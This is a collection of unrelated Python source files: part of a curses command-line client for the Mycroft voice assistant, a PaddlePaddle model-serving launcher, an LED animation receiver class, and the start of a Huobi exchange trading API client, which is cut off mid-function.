CLR_CMDLINE) scr.addstr(curses.LINES - 1, 0, ":", CLR_CMDLINE) ln = line[1:] else: prompt = "Input (':' for command, Ctrl+C to quit)" if show_last_key: prompt += " === keycode: "+last_key scr.addstr(curses.LINES - 2, 0, make_titlebar(prompt, curses.COLS - 1), CLR_HEADING) scr.addstr(curses.LINES - 1, 0, ">", CLR_HEADING) _do_meter(cy_chat_area + 2) scr.addstr(curses.LINES - 1, 2, ln[-(curses.COLS - 3):], CLR_INPUT) # Curses doesn't actually update the display until refresh() is called scr.refresh() def make_titlebar(title, bar_length): return title + " " + ("=" * (bar_length - 1 - len(title))) ############################################################################## # Help system help_struct = [ ( 'Log Scrolling shortcuts', [ ("Up / Down / PgUp / PgDn", "scroll thru history"), ("Ctrl+T / Ctrl+PgUp", "scroll to top of logs (jump to oldest)"), ("Ctrl+B / Ctrl+PgDn", "scroll to bottom of logs" + "(jump to newest)"), ("Left / Right", "scroll long lines left/right"), ("Home / End", "scroll to start/end of long lines") ] ), ( "Query History shortcuts", [ ("Ctrl+N / Ctrl+Right", "previous query"), ("Ctrl+P / Ctrl+Left", "next query") ] ), ( "General Commands (type ':' to enter command mode)", [ (":quit or :exit", "exit the program"), (":meter (show|hide)", "display the microphone level"), (":keycode (show|hide)", "display typed key codes (mainly debugging)"), (":history (# lines)", "set size of visible history buffer"), (":clear", "flush the logs") ] ), ( "Log Manipulation Commands", [ (":filter 'STR'", "adds a log filter (optional quotes)"), (":filter remove 'STR'", "removes a log filter"), (":filter (clear|reset)", "reset filters"), (":filter (show|list)", "display current filters"), (":find 'STR'", "show logs containing 'str'"), (":log level (DEBUG|INFO|ERROR)", "set logging level"), (":log bus (on|off)", "control logging of messagebus messages") ] ), ( "Skill Debugging Commands", [ (":skills", "list installed skills"), (":activate SKILL", "activate skill, e.g. 'activate skill-wiki'"), (":deactivate SKILL", "deactivate skill"), (":keep SKILL", "deactivate all skills except " + "the indicated skill") ] ) ] help_longest = 0 for s in help_struct: for ent in s[1]: help_longest = max(help_longest, len(ent[0])) def num_help_pages(): lines = 0 for section in help_struct: lines += 2 + len(section[1]) return ceil(lines / (curses.LINES - 4)) def do_draw_help(scr): def render_header(): scr.addstr(0, 0, center(25) + "Mycroft Command Line Help", CLR_HEADING) scr.addstr(1, 0, "=" * (curses.COLS - 1), CLR_HEADING) def render_help(txt, y_pos, i, first_line, last_line, clr): if i >= first_line and i < last_line: scr.addstr(y_pos, 0, txt, clr) y_pos += 1 return y_pos def render_footer(page, total): text = "Page {} of {} [ Any key to continue ]".format(page, total) scr.addstr(curses.LINES - 1, 0, center(len(text)) + text, CLR_HEADING) scr.erase() render_header() y = 2 page = subscreen + 1 first = subscreen * (curses.LINES - 7) # account for header last = first + (curses.LINES - 7) # account for header/footer i = 0 for section in help_struct: y = render_help(section[0], y, i, first, last, CLR_HEADING) i += 1 y = render_help("=" * (curses.COLS - 1), y, i, first, last, CLR_HEADING) i += 1 for line in section[1]: words = line[1].split() ln = line[0].ljust(help_longest + 1) for w in words: if len(ln) + 1 + len(w) < curses.COLS: ln += " "+w else: y = render_help(ln, y, i, first, last, CLR_CMDLINE) ln = " ".ljust(help_longest + 2) + w y = render_help(ln, y, i, first, last, CLR_CMDLINE) i += 1 y = render_help(" ", y, i, first, last, CLR_CMDLINE) i += 1 if i > last: break render_footer(page, num_help_pages()) # Curses doesn't actually update the display until refresh() is called scr.refresh() def show_help(): global screen_mode global subscreen if screen_mode != SCR_HELP: screen_mode = SCR_HELP subscreen = 0 set_screen_dirty() def show_next_help(): global screen_mode global subscreen if screen_mode == SCR_HELP: subscreen += 1 if subscreen >= num_help_pages(): screen_mode = SCR_MAIN set_screen_dirty() ############################################################################## # Skill debugging def show_skills(skills): """ Show list of loaded skills in as many column as necessary """ global scr global screen_mode if not scr: return screen_mode = SCR_SKILLS row = 2 column = 0 def prepare_page(): global scr nonlocal row nonlocal column scr.erase() scr.addstr(0, 0, center(25) + "Loaded skills", CLR_CMDLINE) scr.addstr(1, 1, "=" * (curses.COLS - 2), CLR_CMDLINE) row = 2 column = 0 prepare_page() col_width = 0 skill_names = sorted(skills.keys()) for skill in skill_names: if skills[skill]['active']: color = curses.color_pair(4) else: color = curses.color_pair(2) scr.addstr(row, column, " {}".format(skill), color) row += 1 col_width = max(col_width, len(skill)) if row == curses.LINES - 2 and column > 0 and skill != skill_names[-1]: column = 0 scr.addstr(curses.LINES - 1, 0, center(23) + "Press any key to continue", CLR_HEADING) scr.refresh() scr.get_wch() # blocks prepare_page() elif row == curses.LINES - 2: # Reached bottom of screen, start at top and move output to a # New column row = 2 column += col_width + 2 col_width = 0 if column > curses.COLS - 20: # End of screen break scr.addstr(curses.LINES - 1, 0, center(23) + "Press any key to return", CLR_HEADING) scr.refresh() def center(str_len): # generate number of characters needed to center a string # of the given length return " " * ((curses.COLS - str_len) // 2) ############################################################################## # Main UI lopo def _get_cmd_param(cmd, keyword): # Returns parameter to a command. Will de-quote. # Ex: find 'abc def' returns: abc def # find abc def returns: abc def if isinstance(keyword, list): for w in keyword: cmd = cmd.replace(w, "").strip() else: cmd = cmd.replace(keyword, "").strip() if not cmd: return None last_char = cmd[-1] if last_char == '"' or last_char == "'": parts = cmd.split(last_char) return parts[-2] else: parts = cmd.split(" ") return parts[-1] def handle_cmd(cmd): global show_meter global screen_mode global log_filters global cy_chat_area global find_str global show_last_key if "show" in cmd and "log" in cmd: pass elif "help" in cmd: show_help() elif "exit" in cmd or "quit" in cmd: return 1 elif "keycode" in cmd: # debugging keyboard if "hide" in cmd or "off" in cmd: show_last_key = False elif "show" in cmd or "on" in cmd: show_last_key = True elif "meter" in cmd: # microphone level meter if "hide" in cmd or "off" in cmd: show_meter = False elif "show" in cmd or "on" in cmd: show_meter = True elif "find" in cmd: find_str = _get_cmd_param(cmd, "find") rebuild_filtered_log() elif "filter" in cmd: if "show" in cmd or "list" in cmd: # display active filters add_log_message("Filters: " + str(log_filters)) return if "reset" in cmd or "clear" in cmd: log_filters = list(default_log_filters) else: # extract last word(s) param = _get_cmd_param(cmd, "filter") if param: if "remove" in cmd and param in log_filters: log_filters.remove(param) else: log_filters.append(param) rebuild_filtered_log() add_log_message("Filters: " + str(log_filters)) elif "clear" in cmd: clear_log() elif "log" in cmd: # Control logging behavior in all Mycroft processes if "level" in cmd: level = _get_cmd_param(cmd, ["log", "level"]) bus.emit(Message("mycroft.debug.log", data={'level': level})) elif "bus" in cmd: state = _get_cmd_param(cmd, ["log", "bus"]).lower() if state in ["on", "true", "yes"]: bus.emit(Message("mycroft.debug.log", data={'bus': True})) elif state in ["off", "false", "no"]: bus.emit(Message("mycroft.debug.log", data={'bus': False})) elif "history" in cmd: # extract last word(s) lines = int(_get_cmd_param(cmd, "history")) if not lines or lines < 1: lines = 1 max_chat_area = curses.LINES - 7 if lines > max_chat_area: lines = max_chat_area cy_chat_area = lines elif "skills" in cmd: # List loaded skill message = bus.wait_for_response( Message('skillmanager.list'), reply_type='mycroft.skills.list') if message: show_skills(message.data) scr.get_wch() # blocks screen_mode = SCR_MAIN set_screen_dirty() elif "deactivate" in cmd: skills = cmd.split()[1:] if len(skills) > 0: for s in skills: bus.emit(Message("skillmanager.deactivate", data={'skill': s})) else: add_log_message('Usage :deactivate SKILL [SKILL2] [...]') elif "keep" in cmd: s = cmd.split() if len(s) > 1: bus.emit(Message("skillmanager.keep", data={'skill': s[1]})) else: add_log_message('Usage :keep SKILL') elif "activate" in cmd: skills = cmd.split()[1:] if len(skills) > 0: for s in skills: bus.emit(Message("skillmanager.activate", data={'skill': s})) else: add_log_message('Usage :activate SKILL [SKILL2] [...]') # TODO: More commands return 0 # do nothing upon return def handle_is_connected(msg): add_log_message("Connected to Messagebus!") # start_qml_gui(bus, gui_text) def handle_reconnecting(): add_log_message("Looking for Messagebus websocket...") def gui_main(stdscr): global scr global bus global line global log_line_lr_scroll global longest_visible_line global find_str global last_key global history global screen_lock global show_gui global config scr = stdscr init_screen() scr.keypad(1) scr.notimeout(True) bus.on('speak', handle_speak) bus.on('message', handle_message) bus.on('recognizer_loop:utterance', handle_utterance) bus.on('connected', handle_is_connected) bus.on('reconnecting', handle_reconnecting) add_log_message("Establishing Mycroft Messagebus connection...") gui_thread = ScreenDrawThread() gui_thread.setDaemon(True) # this thread won't prevent prog from exiting gui_thread.start() hist_idx = -1 # index, from the bottom c = 0 try: while True: set_screen_dirty() c = 0 code = 0 try: if ctrl_c_pressed(): # User hit Ctrl+C. treat same as Ctrl+X c = 24 else: # Don't block, this allows us to refresh the screen while # waiting on initial messagebus connection, etc scr.timeout(1) c = scr.get_wch() # unicode char or int for special keys if c == -1: continue except curses.error: # This happens in odd cases, such as when you Ctrl+Z # the CLI and then resume. Curses fails on get_wch(). continue if isinstance(c, int): code = c else: code = ord(c) # Convert VT100 ESC codes generated by some terminals if code == 27: # NOTE: Not sure exactly why, but the screen can get corrupted # if we draw to the screen while doing a scr.getch(). So # lock screen updates until the VT100 sequence has been # completely read. with screen_lock: scr.timeout(0) c1 = -1 start = time.time() while c1 == -1: c1 = scr.getch() if time.time()-start > 1: break # 1 second timeout waiting for ESC code c2 = -1 while c2 == -1: c2 = scr.getch() if time.time()-start > 1: # 1 second timeout break # 1 second timeout waiting for ESC code if c1 == 79 and c2 == 120: c = curses.KEY_UP elif c1 == 79 and c2 == 116: c = curses.KEY_LEFT elif c1 == 79 and c2 == 114: c = curses.KEY_DOWN elif c1 == 79 and c2 == 118: c = curses.KEY_RIGHT elif c1 == 79 and c2 == 121: c = curses.KEY_PPAGE # aka PgUp elif c1 == 79 and c2 == 115: c = curses.KEY_NPAGE # aka PgDn elif c1 == 79 and c2 == 119: c = curses.KEY_HOME elif c1 == 79 and c2 == 113: c = curses.KEY_END else: c = c1 if c1 != -1: last_key = str(c) + ",ESC+" + str(c1) + "+" + str(c2) code = c else: last_key = "ESC" else: if code < 33: last_key = str(code) else: last_key = str(code) scr.timeout(-1) # resume blocking if code == 27: # Hitting ESC twice clears the entry line hist_idx = -1 line = "" elif c == curses.KEY_RESIZE: # Generated by Curses when window/screen has been resized y, x = scr.getmaxyx() curses.resizeterm(y, x) # resizeterm() causes another curses.KEY_RESIZE, so # we need to capture that to prevent a loop of resizes c = scr.get_wch() elif screen_mode == SCR_HELP: # in Help mode, any key goes to next page show_next_help() continue elif c == '\n' or code == 10 or code == 13 or code == 343: # ENTER sends the typed line to be processed by Mycroft if line == "": continue if line[:1] == ":": # Lines typed like ":help" are 'commands' if handle_cmd(line[1:]) == 1: break else: # Treat this as an utterance bus.emit(Message("recognizer_loop:utterance", {'utterances': [line.strip()], 'lang': config.get('lang', 'en-us')})) hist_idx = -1 line = "" elif code == 16 or code == 545: # Ctrl+P or Ctrl+Left (Previous) # Move up the history stack hist_idx = clamp(hist_idx + 1, -1, len(history) - 1) if hist_idx >= 0: line = history[len(history) - hist_idx - 1] else: line = "" elif code == 14 or code == 560: # Ctrl+N or Ctrl+Right (Next) # Move down the history stack hist_idx = clamp(hist_idx - 1, -1, len(history) - 1) if hist_idx >= 0: line = history[len(history) - hist_idx - 1] else: line = "" elif c == curses.KEY_LEFT: # scroll long log lines left log_line_lr_scroll += curses.COLS // 4 elif c == curses.KEY_RIGHT: # scroll long log lines right log_line_lr_scroll -= curses.COLS // 4 if log_line_lr_scroll < 0: log_line_lr_scroll = 0 elif c == curses.KEY_HOME: # HOME scrolls log lines all the way to the start log_line_lr_scroll = longest_visible_line elif c == curses.KEY_END: # END scrolls log lines all the way to the end log_line_lr_scroll = 0 elif c == curses.KEY_UP: scroll_log(False, 1) elif c == curses.KEY_DOWN: scroll_log(True, 1) elif c == curses.KEY_NPAGE: # aka PgDn # PgDn to go down a page in the logs scroll_log(True) elif c == curses.KEY_PPAGE: # aka PgUp # PgUp to go up a page in the logs scroll_log(False) elif code == 2 or code == 550: # Ctrl+B or Ctrl+PgDn scroll_log(True, max_log_lines) elif code == 20 or code == 555: # Ctrl+T or Ctrl+PgUp scroll_log(False, max_log_lines) elif code == curses.KEY_BACKSPACE or code == 127: # Backspace to erase a character in the utterance line = line[:-1] elif code == 6: # Ctrl+F (Find) line = ":find " elif code == 7: # Ctrl+G (start GUI) if show_gui is None: start_qml_gui(bus, gui_text) show_gui = not show_gui elif code == 18: # Ctrl+R (Redraw) scr.erase() elif code == 24: # Ctrl+X (Exit) if find_str: # End the find session find_str = None rebuild_filtered_log() elif line.startswith(":"): # cancel command mode line = "" else: # exit CLI break elif code > 31 and isinstance(c, str): # Accept typed character in the utterance line += c finally: scr.erase() scr.refresh() scr = None def simple_cli(): global bSimple bSimple = True bus.on('speak', handle_speak) try: while True: # Sleep for a while so all the output that results # from the previous command finishes before we print. time.sleep(1.5) print("Input (Ctrl+C to quit):") line = sys.stdin.readline() bus.emit(Message("recognizer_loop:utterance", {'utterances': [line.strip()]})) except KeyboardInterrupt as e: # User hit Ctrl+C to quit print("") except KeyboardInterrupt as e: LOG.exception(e) event_thread.exit() sys.exit() def connect_to_messagebus(): """ Connect to the mycroft messagebus and launch a thread handling the connection. Returns: WebsocketClient """ bus = WebsocketClient() # Mycroft messagebus connection event_thread = Thread(target=connect, args=[bus]) event_thread.setDaemon(True) event_thread.start() return bus
serve.py
# Copyright (c) 2020 PaddlePaddle Authors. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """ Usage: Host a trained paddle model with one line command Example: python -m paddle_serving_server.serve --model ./serving_server_model --port 9292 """ import argparse import os import json import base64 import time from multiprocessing import Process from flask import Flask, request import sys if sys.version_info.major == 2: from BaseHTTPServer import BaseHTTPRequestHandler, HTTPServer elif sys.version_info.major == 3: from http.server import BaseHTTPRequestHandler, HTTPServer def serve_args(): parser = argparse.ArgumentParser("serve") parser.add_argument( "--thread", type=int, default=2, help="Concurrency of server") parser.add_argument( "--port", type=int, default=9292, help="Port of the starting gpu") parser.add_argument( "--device", type=str, default="gpu", help="Type of device") parser.add_argument("--gpu_ids", type=str, default="", help="gpu ids") parser.add_argument( "--model", type=str, default="", nargs="+", help="Model for serving") parser.add_argument( "--workdir", type=str, default="workdir", help="Working dir of current service") parser.add_argument( "--name", type=str, default="None", help="Default service name") parser.add_argument( "--use_mkl", default=False, action="store_true", help="Use MKL") parser.add_argument( "--precision", type=str, default="fp32", help="precision mode(fp32, int8, fp16, bf16)") parser.add_argument( "--use_calib", default=False, action="store_true", help="Use TensorRT Calibration") parser.add_argument( "--mem_optim_off", default=False, action="store_true", help="Memory optimize") parser.add_argument( "--ir_optim", default=False, action="store_true", help="Graph optimize") parser.add_argument( "--max_body_size", type=int, default=512 * 1024 * 1024, help="Limit sizes of messages") parser.add_argument( "--use_encryption_model", default=False, action="store_true", help="Use encryption model") parser.add_argument( "--use_multilang", default=False, action="store_true", help="Use Multi-language-service") parser.add_argument( "--use_trt", default=False, action="store_true", help="Use TensorRT") parser.add_argument( "--use_lite", default=False, action="store_true", help="Use PaddleLite") parser.add_argument( "--use_xpu", default=False, action="store_true", help="Use XPU") parser.add_argument( "--product_name", type=str, default=None, help="product_name for authentication") parser.add_argument( "--container_id", type=str, default=None, help="container_id for authentication") return parser.parse_args() def start_standard_model(serving_port): # pylint: disable=doc-string-missing args = serve_args() thread_num = args.thread model = args.model port = serving_port workdir = args.workdir device = args.device mem_optim = args.mem_optim_off is False ir_optim = args.ir_optim max_body_size = args.max_body_size use_mkl = args.use_mkl use_encryption_model = args.use_encryption_model use_multilang = args.use_multilang if model == "": print("You must specify your serving model") exit(-1) for single_model_config in args.model: if os.path.isdir(single_model_config): pass elif os.path.isfile(single_model_config): raise ValueError("The input of --model should be a dir not file.") import paddle_serving_server as serving op_maker = serving.OpMaker() op_seq_maker = serving.OpSeqMaker() read_op = op_maker.create('general_reader') op_seq_maker.add_op(read_op) for idx, single_model in enumerate(model): infer_op_name = "general_infer" #Temporary support for OCR model,it will be completely revised later #If you want to use this, C++ server must compile with WITH_OPENCV option. if len(model) == 2 and idx == 0 and model[0] == 'ocr_det_model': infer_op_name = "general_detection" general_infer_op = op_maker.create(infer_op_name) op_seq_maker.add_op(general_infer_op) general_response_op = op_maker.create('general_response') op_seq_maker.add_op(general_response_op) server = None if use_multilang: server = serving.MultiLangServer() else: server = serving.Server() server.set_op_sequence(op_seq_maker.get_op_sequence()) server.set_num_threads(thread_num) server.set_memory_optimize(mem_optim) server.set_ir_optimize(ir_optim) server.use_mkl(use_mkl) server.set_max_body_size(max_body_size) server.set_port(port) server.set_precision(args.precision) server.set_use_calib(args.use_calib) server.use_encryption_model(use_encryption_model) if args.product_name != None: server.set_product_name(args.product_name) if args.container_id != None: server.set_container_id(args.container_id) server.load_model_config(model) server.prepare_server(workdir=workdir, port=port, device=device) server.run_server() def start_gpu_card_model(index, gpuid, port, args): # pylint: disable=doc-string-missing workdir = args.workdir gpuid = int(gpuid) device = "gpu" if gpuid == -1: device = "cpu" elif gpuid >= 0: port = port + index thread_num = args.thread model = args.model mem_optim = args.mem_optim_off is False ir_optim = args.ir_optim use_mkl = args.use_mkl max_body_size = args.max_body_size use_multilang = args.use_multilang if gpuid >= 0: workdir = "{}_{}".format(args.workdir, gpuid) if model == "": print("You must specify your serving model") exit(-1) for single_model_config in args.model: if os.path.isdir(single_model_config): pass elif os.path.isfile(single_model_config): raise ValueError("The input of --model should be a dir not file.") import paddle_serving_server as serving op_maker = serving.OpMaker() op_seq_maker = serving.OpSeqMaker() read_op = op_maker.create('general_reader') op_seq_maker.add_op(read_op) for idx, single_model in enumerate(model): infer_op_name = "general_infer" if len(model) == 2 and idx == 0: infer_op_name = "general_detection" else: infer_op_name = "general_infer" general_infer_op = op_maker.create(infer_op_name) op_seq_maker.add_op(general_infer_op) general_response_op = op_maker.create('general_response') op_seq_maker.add_op(general_response_op) if use_multilang: server = serving.MultiLangServer() else: server = serving.Server() server.set_op_sequence(op_seq_maker.get_op_sequence()) server.set_num_threads(thread_num) server.use_mkl(use_mkl) server.set_precision(args.precision) server.set_use_calib(args.use_calib) server.set_memory_optimize(mem_optim) server.set_ir_optimize(ir_optim) server.set_max_body_size(max_body_size) if args.use_trt: server.set_trt() if args.use_lite: server.set_lite() server.set_device(device) if args.use_xpu: server.set_xpu() if args.product_name != None: server.set_product_name(args.product_name) if args.container_id != None: server.set_container_id(args.container_id) server.load_model_config(model) server.prepare_server( workdir=workdir, port=port, device=device, use_encryption_model=args.use_encryption_model) if gpuid >= 0: server.set_gpuid(gpuid) server.run_server() def start_multi_card(args, serving_port=None): # pylint: disable=doc-string-missing gpus = "" if serving_port == None: serving_port = args.port if args.gpu_ids == "": gpus = [] else: gpus = args.gpu_ids.split(",") if "CUDA_VISIBLE_DEVICES" in os.environ: env_gpus = os.environ["CUDA_VISIBLE_DEVICES"].split(",") for ids in gpus: if ids not in env_gpus: print("gpu_ids is not in CUDA_VISIBLE_DEVICES.") exit(-1) else: env_gpus = [] if args.use_lite: print("run using paddle-lite.") start_gpu_card_model(-1, -1, serving_port, args) elif len(gpus) <= 0: print("gpu_ids not set, going to run cpu service.") start_gpu_card_model(-1, -1, serving_port, args) else: gpu_processes = [] for i, gpu_id in enumerate(gpus): p = Process( target=start_gpu_card_model, args=( i, gpu_id, serving_port, args, )) gpu_processes.append(p) for p in gpu_processes: p.start() for p in gpu_processes: p.join() class MainService(BaseHTTPRequestHandler): def get_available_port(self): default_port = 12000 for i in range(1000): if port_is_available(default_port + i): return default_port + i def start_serving(self): start_multi_card(args, serving_port) def get_key(self, post_data): if "key" not in post_data: return False else: key = base64.b64decode(post_data["key"].encode()) for single_model_config in args.model: if os.path.isfile(single_model_config): raise ValueError( "The input of --model should be a dir not file.") with open(single_model_config + "/key", "wb") as f: f.write(key) return True def check_key(self, post_data): if "key" not in post_data: return False else: key = base64.b64decode(post_data["key"].encode()) for single_model_config in args.model: if os.path.isfile(single_model_config): raise ValueError( "The input of --model should be a dir not file.") with open(single_model_config + "/key", "rb") as f: cur_key = f.read() if key != cur_key: return False return True def start(self, post_data): post_data = json.loads(post_data.decode('utf-8')) global p_flag if not p_flag: if args.use_encryption_model: print("waiting key for model") if not self.get_key(post_data): print("not found key in request") return False global serving_port global p serving_port = self.get_available_port() p = Process(target=self.start_serving) p.start() time.sleep(3) if p.is_alive(): p_flag = True else: return False else: if p.is_alive(): if not self.check_key(post_data): return False else: return False return True def do_POST(self): content_length = int(self.headers['Content-Length']) post_data = self.rfile.read(content_length) if self.start(post_data): response = {"endpoint_list": [serving_port]} else: response = {"message": "start serving failed"} self.send_response(200) self.send_header('Content-type', 'application/json') self.end_headers() self.wfile.write(json.dumps(response).encode()) if __name__ == "__main__": args = serve_args() for single_model_config in args.model: if os.path.isdir(single_model_config): pass elif os.path.isfile(single_model_config): raise ValueError("The input of --model should be a dir not file.") if args.name == "None": from .web_service import port_is_available if args.use_encryption_model: p_flag = False p = None serving_port = 0 server = HTTPServer(('localhost', int(args.port)), MainService) print( 'Starting encryption server, waiting for key from client, use <Ctrl-C> to stop' ) server.serve_forever() else: start_multi_card(args) else: from .web_service import WebService web_service = WebService(name=args.name) web_service.load_model_config(args.model) gpu_ids = args.gpu_ids if gpu_ids == "": if "CUDA_VISIBLE_DEVICES" in os.environ: gpu_ids = os.environ["CUDA_VISIBLE_DEVICES"] if len(gpu_ids) > 0: web_service.set_gpus(gpu_ids) web_service.prepare_server( workdir=args.workdir, port=args.port, device=args.device, use_lite=args.use_lite, use_xpu=args.use_xpu, ir_optim=args.ir_optim, thread_num=args.thread, precision=args.precision, use_calib=args.use_calib) web_service.run_rpc_service() app_instance = Flask(__name__) @app_instance.before_first_request def init(): web_service._launch_web_service() service_name = "/" + web_service.name + "/prediction" @app_instance.route(service_name, methods=["POST"]) def run(): return web_service.get_prediction(request) app_instance.run(host="0.0.0.0", port=web_service.port, threaded=False, processes=4)
receiver.py
from . animation import Animation from .. util import log import threading from enum import IntEnum class HOST_TYPE(IntEnum): STRIP = 1 MATRIX = 2 CIRCLE = 3 CUBE = 4 HOST_MAP = { 'Strip': HOST_TYPE.STRIP, 'Matrix': HOST_TYPE.MATRIX, 'Circle': HOST_TYPE.CIRCLE, 'Cube': HOST_TYPE.CUBE, } class Receiver(Animation): free_run = True def __init__(self, layout, **kwds): super().__init__(layout, **kwds) name = type(self.layout).__name__ if name not in HOST_MAP: raise ValueError('layout must be of type' + ', '.join(HOST_MAP)) self.host_type = HOST_MAP[name] self._hold_for_data = threading.Event() self._stop_event = threading.Event() self._stop_event.clear() self._recv_thread_obj = None def pre_run(self): self.start() def start(self): self._t = threading.Thread(target=self._recv_thread_obj) self._t.setDaemon(True) # don't hang on exit self._t.start() log.info("Receiver Listening on %s", self.address) def thread_cleanup(self): # To be overriden, if need be pass def stop(self): self._stop_event.set() log.info("Stopping Receiver...") self.thread_cleanup() def _exit(self, type, value, traceback): self.stop() def step(self, amt=1): """ This may seem silly, but on a Receiver step() need not do anything. Instead, receive the data on the receive thread and set it on the buffer then call self._hold_for_data.set() """ if not self._stop_event.isSet(): self._hold_for_data.wait() self._hold_for_data.clear() from .. util import deprecated if deprecated.allowed(): # pragma: no cover BaseReceiver = Receiver
vnhuobi.py
# encoding: utf-8 import urllib import hmac import base64 import hashlib import requests import traceback from copy import copy from datetime import datetime from threading import Thread from queue import Queue, Empty from multiprocessing.dummy import Pool from time import sleep import json import zlib from websocket import create_connection, _exceptions # 常量定义 TIMEOUT = 5 HUOBI_API_HOST = "api.huobi.pro" HADAX_API_HOST = "api.hadax.com" LANG = 'zh-CN' DEFAULT_GET_HEADERS = { "Content-type": "application/x-www-form-urlencoded", 'Accept': 'application/json', 'Accept-Language': LANG, 'User-Agent':'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0' } DEFAULT_POST_HEADERS = { 'Content-Type': 'application/json', 'Accept': 'application/json', 'Accept-Language': LANG, 'User-Agent':'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0' } #---------------------------------------------------------------------- def createSign(params, method, host, path, secretKey): """创建签名""" sortedParams = sorted(params.items(), key=lambda d: d[0], reverse=False) encodeParams = urllib.urlencode(sortedParams) payload = [method, host, path, encodeParams] payload = '\n'.join(payload) payload = payload.encode(encoding='UTF8') secretKey = secretKey.encode(encoding='UTF8') digest = hmac.new(secretKey, payload, digestmod=hashlib.sha256).digest() signature = base64.b64encode(digest) signature = signature.decode() return signature ######################################################################## class TradeApi(object): """交易API""" HUOBI = 'huobi' HADAX = 'hadax' SYNC_MODE = 'sync' ASYNC_MODE = 'async' #---------------------------------------------------------------------- def __init__(self): """Constructor""" self.accessKey = '' self.secretKey = '' self.mode = self.ASYNC_MODE self.active = False # API工作状态 self.reqid = 0 # 请求编号 self.queue = Queue() # 请求队列 self.pool = None # 线程池 #---------------------------------------------------------------------- def init(self, host, accessKey, secretKey, mode=None): """初始化""" if host == self.HUOBI: self.hostname = HUOBI_API_HOST else: self.hostname = HADAX_API_HOST self.hosturl = 'https://%s' %self.hostname self.accessKey = accessKey self.secretKey = secretKey if mode: self.mode = mode self.proxies = {} return True #---------------------------------------------------------------------- def start(self, n=10): """启动""" self.active = True if self.mode == self.ASYNC_MODE: self.pool = Pool(n) self.pool.map_async(self.run, range(n)) #---------------------------------------------------------------------- def close(self): """停止""" self.active = False self.pool.close() self.pool.join() #---------------------------------------------------------------------- def httpGet(self, url, params): """HTTP GET""" headers = copy(DEFAULT_GET_HEADERS) postdata = urllib.urlencode(params) try: response = requests.get(url, postdata, headers=headers, timeout=TIMEOUT) if response.status_code == 200: return True, response.json() else: return False, u'GET请求失败,状态代码:%s' %response.status_code except Exception as e: return False, u'GET请求触发异常,原因:%s' %e #---------------------------------------------------------------------- def httpPost(self, url, params, add_to_headers=None): """HTTP POST""" headers = copy(DEFAULT_POST_HEADERS) postdata = json.dumps(params) try: response = requests.post(url, postdata, headers=headers, timeout=TIMEOUT) if response.status_code == 200: return True, response.json() else: return False, u'POST请求失败,返回信息:%s' %response.json() except Exception as e: return False, u'POST请求触发异常,原因:%s' %e #---------------------------------------------------------------------- def generateSignParams(self): """生成签名参数""" timestamp = datetime.utcnow().strftime('%Y-%m-%dT%H:%M:%S') d = { 'AccessKeyId': self.accessKey, 'SignatureMethod': 'HmacSHA256', 'SignatureVersion': '2', 'Timestamp': timestamp } return d #---------------------------------------------------------------------- def apiGet(self, path, params): """API GET""" method = 'GET' params.update(self.generateSignParams()) params['Signature'] = createSign(params, method, self.hostname, path, self.secretKey) url = self.hosturl + path return self.httpGet(url, params) #---------------------------------------------------------------------- def apiPost(self, path, params): """API POST""" method = 'POST' signParams = self.generateSignParams() signParams['Signature'] = createSign(signParams, method, self.hostname, path, self.secretKey) url = self.hosturl + path + '?' + urllib.urlencode(signParams) return self.httpPost(url, params) #---------------------------------------------------------------------- def addReq(self, path, params, func, callback): """添加请求""" # 异步模式 if self.mode == self.ASYNC_MODE: self.reqid += 1 req = (path, params, func, callback, self.reqid) self.queue.put(req) return self.reqid # 同步模式 else: return func(path, params) #---------------------------------------------------------------------- def processReq(self, req): """处理请求""" path, params, func, callback, reqid = req result, data = func(path, params) if result: if data['status'] == 'ok': callback(data['data'], reqid) else: msg = u'错误代码:%s,错误信息:%s' %(data['err-code'], data['err-msg']) self.onError(msg, reqid) else: self.onError(data, reqid) # 失败的请求重新放回队列,等待下次处理 self.queue.put(req) #---------------------------------------------------------------------- def run(self, n): """连续运行""" while self.active: try: req = self.queue.get(timeout=1) self.processReq(req) except Empty: pass #---------------------------------------------------------------------- def getSymbols(self): """查询合约代码""" if self.hostname == HUOBI_API_HOST: path = '/v1/common/symbols' else: path = '/v1/hadax/common/symbols' params = {} func = self.apiGet callback = self.onGetSymbols return self.addReq(path, params, func, callback) #---------------------------------------------------------------------- def getCurrencys(self): """查询支持货币""" if self.hostname == HUOBI_API_HOST: path = '/v1/common/currencys' else: path = '/v1/hadax/common/currencys' params = {} func = self.apiGet callback = self.onGetCurrencys return self.addReq(path, params, func, callback) #---------------------------------------------------------------------- def getTimestamp(self): """查询系统时间""" path = '/v1/common/timestamp' params = {} func = self.apiGet callback = self.onGetTimestamp return self.addReq(path, params, func, callback) #---------------------------------------------------------------------- def getAccounts(self): """查询账户""" path = '/v1/account/accounts' params = {} func = self.apiGet callback = self.onGetAccounts return self.addReq(path, params, func, callback) #---------------------------------------------------------------------- def getAccountBalance(self, accountid): """查询余额""" if self.hostname == HUOBI_API_HOST: path = '/v1/account/accounts/%s/balance' %accountid else: path = '/v1/hadax/account/accounts/%s/balance' %accountid params = {} func = self.apiGet callback = self.onGetAccountBalance return self.addReq(path, params, func, callback) #---------------------------------------------------------------------- def getOrders(self, symbol, states, types=None, startDate=None, endDate=None, from_=None, direct=None, size=None): """查询委托""" path = '/v1/order/orders' params = { 'symbol': symbol, 'states': states } if types: params['types'] = types if startDate: params['start-date'] = startDate if endDate: params['end-date'] = endDate if from_: params['from'] = from_ if direct: params['direct'] = direct if size: params['size'] = size func = self.apiGet callback = self.onGetOrders return self.addReq(path, params, func, callback) #---------------------------------------------------------------------- def getMatchResults(self, symbol, types=None, startDate=None, endDate=None, from_=None, direct=None, size=None): """查询委托""" path = '/v1/order/matchresults' params = { 'symbol': symbol } if types: params['types'] = types if startDate: params['start-date'] = startDate if endDate: params['end-date'] = endDate if from_: params['from'] = from_ if direct: params['direct'] = direct if size: params['size'] = size func = self.apiGet callback = self.onGetMatchResults return self.addReq(path, 